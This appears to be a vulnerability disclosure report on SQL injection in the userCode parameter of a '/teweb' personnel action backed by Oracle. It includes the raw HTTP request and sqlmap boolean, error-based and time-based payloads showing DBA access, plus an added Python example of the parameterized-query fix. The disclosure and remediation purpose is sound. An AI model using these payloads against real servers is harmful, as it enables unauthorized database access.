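2015-12-11: Details reported to the vendor; awaiting vendor handling
2015-12-15: Vendor confirmed; details disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and experts in related fields
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public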
As the title says.
Vulnerable URL
GET /teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449747891472&sysUser.userCode=admin*&sysUser.credentialsno=&usercode=&_=1449747873785 HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Referer: http://**.**.**.**:8080/teweb/page/userreg/unit/unitRegApply1.jsp;jsessionid=AC87266F02AD7EDA6D2ADFE49F76F657
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=AC87266F02AD7EDA6D2ADFE49F76F657
The sysUser.userCode parameter is vulnerable to SQL injection.
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:8080/teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449746998788&sysUser.userCode=admin' AND 7603=7603 AND 'KPAP'='KPAP&sysUser.credentialsno=&usercode=&_=1449746819223

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:8080/teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449746998788&sysUser.userCode=admin' AND 9537=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9537=9537) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'YDzi'='YDzi&sysUser.credentialsno=&usercode=&_=1449746819223

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:8080/teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449746998788&sysUser.userCode=admin' AND 7564=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(119)||CHR(83)||CHR(102),5) AND 'lIGs'='lIGs&sysUser.credentialsno=&usercode=&_=1449746819223
---
[19:32:28] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
DBA privileges
@
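The root cause and its fix, as an added example that is not part of the original report and not the affected application's code: a user-code lookup built by string concatenation beside the same lookup with a bound parameter, exercised with the boolean-based probe from the sqlmap output. It assumes SQLite in place of Oracle so it runs offline; the table, column and function names are hypothetical.

```python
import sqlite3

# Probe from the sqlmap output above, and a constructed always-false variant.
TRUE_PROBE = "admin' AND 7603=7603 AND 'KPAP'='KPAP"
FALSE_PROBE = "admin' AND 7603=7604 AND 'KPAP'='KPAP"


def make_db():
    """Constructed sample data; the sys_user table and column are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sys_user (user_code TEXT PRIMARY KEY)")
    db.execute("INSERT INTO sys_user VALUES ('admin')")
    return db


def user_code_exists_vulnerable(db, user_code):
    # 'Before' form: the request value is concatenated into the SQL text, so a
    # quote in user_code closes the literal and the remainder is parsed as SQL.
    sql = "SELECT COUNT(*) FROM sys_user WHERE user_code = '" + user_code + "'"
    return db.execute(sql).fetchone()[0] > 0


def user_code_exists_safe(db, user_code):
    # Hardened form: the value is bound as a parameter and is only ever data.
    sql = "SELECT COUNT(*) FROM sys_user WHERE user_code = ?"
    return db.execute(sql, (user_code,)).fetchone()[0] > 0


def interprets_input_as_sql(check):
    """Regression check: True if the two probes get different answers,
    i.e. the AND clause inside the value was evaluated by the database."""
    db = make_db()
    return check(db, TRUE_PROBE) != check(db, FALSE_PROBE)


if __name__ == "__main__":
    for check in (user_code_exists_vulnerable, user_code_exists_safe):
        print(check.__name__, "interprets input as SQL:",
              interprets_input_as_sql(check))
```

In a Java application the same fix is a JDBC PreparedStatement with a bound parameter. Running the application's database account without DBA rights limits what any remaining injection can reach.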
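Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-15 14:34
CNVD did not reproduce the situation described. The report has been forwarded through CNCERT to the higher-level national information security coordination body, which will coordinate follow-up handling with the organization that manages the website.
None yet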